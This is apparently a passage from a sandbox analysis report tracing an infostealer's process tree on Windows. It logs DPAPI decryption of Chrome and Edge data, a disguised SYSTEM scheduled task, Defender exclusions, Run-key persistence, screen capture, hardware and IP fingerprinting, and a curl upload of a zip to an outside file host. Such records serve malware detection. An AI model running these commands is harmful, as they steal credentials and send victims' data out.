    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,78,225,238,81,242,54,93,114,41,201,135,233,255,51,75,238,124,114,206,112,243,167,94,224,197,29,56,62,200,31,128,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,40,81,43,68,9,153,70,109,187,36,190,193,130,199,26,127,136,124,228,38,75,140,243,89,30,61,103,46,86,143,248,114,48,0,0,0,74,114,75,149,196,38,186,148,133,105,94,129,195,110,235,68,200,129,136,10,22,240,206,253,218,83,18,90,16,39,9,59,49,59,29,171,216,54,192,146,21,178,227,71,99,75,94,246,64,0,0,0,180,88,177,47,121,123,242,119,228,145,146,122,99,155,71,54,241,51,242,143,81,213,228,170,129,248,243,66,58,36,75,175,250,106,42,226,225,210,105,192,4,197,208,8,192,1,143,181,94,58,123,195,86,100,93,247,64,252,117,239,146,183,104,157), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,20,29,26,98,64,44,226,214,150,140,5,93,9,205,157,159,142,9,7,42,55,240,110,187,23,162,197,9,239,20,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,187,82,227,91,150,150,10,73,155,252,195,239,145,62,190,145,28,48,233,205,131,115,209,185,225,150,206,173,252,73,23,0,48,0,0,0,55,32,18,46,197,59,107,47,89,116,117,185,66,233,212,221,74,21,152,12,51,238,20,40,9,173,78,120,242,64,7,86,235,65,242,114,115,156,18,65,86,66,251,152,179,54,32,45,64,0,0,0,99,246,183,155,42,60,223,219,232,128,240,225,213,68,124,100,113,0,228,185,135,178,112,127,159,177,22,200,242,183,134,29,223,162,60,116,168,153,158,193,120,62,40,23,107,206,25,85,46,230,94,142,143,13,74,105,180,61,20,0,122,6,4,110), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,20,29,26,98,64,44,226,214,150,140,5,93,9,205,157,159,142,9,7,42,55,240,110,187,23,162,197,9,239,20,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,187,82,227,91,150,150,10,73,155,252,195,239,145,62,190,145,28,48,233,205,131,115,209,185,225,150,206,173,252,73,23,0,48,0,0,0,55,32,18,46,197,59,107,47,89,116,117,185,66,233,212,221,74,21,152,12,51,238,20,40,9,173,78,120,242,64,7,86,235,65,242,114,115,156,18,65,86,66,251,152,179,54,32,45,64,0,0,0,99,246,183,155,42,60,223,219,232,128,240,225,213,68,124,100,113,0,228,185,135,178,112,127,159,177,22,200,242,183,134,29,223,162,60,116,168,153,158,193,120,62,40,23,107,206,25,85,46,230,94,142,143,13,74,105,180,61,20,0,122,6,4,110), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:68
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4868
- - C:\Windows\system32\reg.exe
    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
    3⤵
    PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4908
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
  2⤵
  - Hide Artifacts: Hidden Window
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    PID:1620
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fztpdle2\fztpdle2.cmdline"
      4⤵
      PID:720
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99A0.tmp" "c:\Users\Admin\AppData\Local\Temp\fztpdle2\CSCED27ED56003450AB6A0C9D81CFCD6D3.TMP"
        5⤵
        
        PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:516
- - C:\Windows\system32\cscript.exe
    cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
    3⤵
    - Checks computer location settings
    PID:4180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
      4⤵
      PID:1628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2328
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Setup.exe" /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:8
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        5⤵
        Modifies registry key
        
        PID:3096
    - - C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        5⤵
        
        PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    PID:2348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3808
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
  2⤵
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_computersystemproduct get uuid
    3⤵
    PID:456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:3292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
  2⤵
  PID:2892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Description,PNPDeviceID
    3⤵
    PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:5016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
  2⤵
  PID:4468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic memorychip get serialnumber
    3⤵
    PID:2576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4756
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:2708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
  2⤵
  PID:3684
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get processorid
    3⤵
    PID:68
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
  2⤵
  PID:1660
- - C:\Windows\system32\getmac.exe
    getmac /NH
    3⤵
    PID:3772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1252
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:1056
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:3304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1400
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:3576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3952
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:3732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:880
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:1448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:2772
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1940
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:796
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:3608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1116
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:3664
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4004
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2192
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:2564
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:540
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
  2⤵
  PID:2628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Sxacgpin.zip";"
  2⤵
  PID:3824
- - C:\Windows\system32\curl.exe
    curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Sxacgpin.zip";
    3⤵
    PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:232
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2384
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:2312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4144
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2544
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:668
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:2496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:4048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2328
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:540
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:1044
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
  2⤵
  PID:1608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:4744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3720
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:892
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4928
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:1956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:1552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:2892
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:4716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:3676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4848
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:4872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get smbiosbiosversion
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
  2⤵
  PID:2716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic MemoryChip get /format:list
    3⤵
    PID:3900
- - C:\Windows\system32\find.exe
    find /i "Speed"
    3⤵
    PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
  2⤵
  PID:996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:4492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
  2⤵
  PID:4128
- - C:\Windows\system32\curl.exe
    curl http://api.ipify.org/ --ssl-no-revoke
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
  2⤵
  PID:5108
- - C:\Windows\System32\Wbem\WMIC.exe
